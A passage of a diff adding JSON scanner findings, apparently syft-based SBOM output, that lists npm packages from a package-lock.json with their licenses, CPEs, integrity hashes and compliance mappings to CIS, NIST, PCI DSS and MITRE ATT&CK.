"IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "eedb1c984540056e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: hyphen 1.14.1", + "title": "hyphen 1.14.1", + "description": "Package discovered: hyphen 1.14.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0cfa30ecdd760351", + "name": "hyphen", + "version": "1.14.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:hyphen:hyphen:1.14.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/hyphen@1.14.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz", + "integrity": "sha512-kvL8xYl5QMTh+LwohVN72ciOxC0OEV79IPdJSTwEXok9y9QHebXGdFgrED4sWfiax/ODx++CAMk3hMy4XPJPOw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "233f854a4d966408", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: iconv-lite 0.4.24", + "title": "iconv-lite 0.4.24", + "description": "Package discovered: iconv-lite 0.4.24", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3ce09826a837d25b", + "name": "iconv-lite", + "version": "0.4.24", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:iconv-lite:iconv-lite:0.4.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:iconv-lite:iconv_lite:0.4.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:iconv_lite:iconv-lite:0.4.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:iconv_lite:iconv_lite:0.4.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:iconv:iconv-lite:0.4.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:iconv:iconv_lite:0.4.24:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/iconv-lite@0.4.24", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz", + "integrity": "sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==", + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a2d6f15d605131f9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: inherits 2.0.4", + "title": "inherits 2.0.4", + "description": "Package discovered: inherits 2.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "911374ff7f37ba7f", + "name": "inherits", + "version": "2.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:inherits:inherits:2.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/inherits@2.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6970e7e10ca27673", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ini 1.3.8", + "title": "ini 1.3.8", + "description": "Package discovered: ini 1.3.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "29aeb86d59c0f085", + "name": "ini", + "version": "1.3.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ini_project:ini:1.3.8:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/ini@1.3.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", + "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9c64ace1b439e4fe", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: internmap 2.0.3", + "title": "internmap 2.0.3", + "description": "Package discovered: internmap 2.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "da7b570ddddf2064", + "name": "internmap", + "version": "2.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:internmap:internmap:2.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/internmap@2.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/internmap/-/internmap-2.0.3.tgz", + "integrity": "sha512-5Hh7Y1wQbvY5ooGgPbDaL5iYLAPzMTUrjMulskHLH6wnv/A+1q5rgEaiuqEjB+oxGXIVZs1FF+R/KPN3ZSQYYg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f4c9c2133d427419", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ioredis 5.10.1", + "title": "ioredis 5.10.1", + "description": "Package discovered: ioredis 5.10.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0c5e141c3ee662a0", + "name": "ioredis", + "version": "5.10.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ioredis:ioredis:5.10.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ioredis@5.10.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ioredis/-/ioredis-5.10.1.tgz", + "integrity": "sha512-HuEDBTI70aYdx1v6U97SbNx9F1+svQKBDo30o0b9fw055LMepzpOOd0Ccg9Q6tbqmBSJaMuY0fB7yw9/vjBYCA==", + "dependencies": { + "@ioredis/commands": "1.5.1", + "cluster-key-slot": "^1.1.0", + "debug": "^4.3.4", + "denque": "^2.1.0", + "lodash.defaults": "^4.2.0", + "lodash.isarguments": "^3.1.0", + "redis-errors": "^1.2.0", + "redis-parser": "^3.0.0", + "standard-as-callback": "^2.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "af1cc3d21ce4d415", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ip-address 10.2.0", + "title": "ip-address 10.2.0", + "description": "Package discovered: ip-address 10.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "25abf70855373b85", + "name": "ip-address", + "version": "10.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ip-address:ip-address:10.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ip-address:ip_address:10.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ip_address:ip-address:10.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ip_address:ip_address:10.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ip:ip-address:10.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:ip:ip_address:10.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ip-address@10.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz", + "integrity": "sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5ea31e6ac67f4d75", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ipaddr.js 1.9.1", + "title": "ipaddr.js 1.9.1", + "description": "Package discovered: ipaddr.js 1.9.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c7a7f0ed243b0857", + "name": "ipaddr.js", + "version": "1.9.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:ipaddr.js:ipaddr.js:1.9.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/ipaddr.js@1.9.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz", + "integrity": "sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fae14e02f5662aa3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: is-arrayish 0.3.4", + "title": "is-arrayish 0.3.4", + "description": "Package discovered: is-arrayish 0.3.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "88ac3450fc3712b8", + "name": "is-arrayish", + "version": "0.3.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:is-arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is-arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is_arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is-arrayish:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:is:is_arrayish:0.3.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/is-arrayish@0.3.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.3.4.tgz", + "integrity": 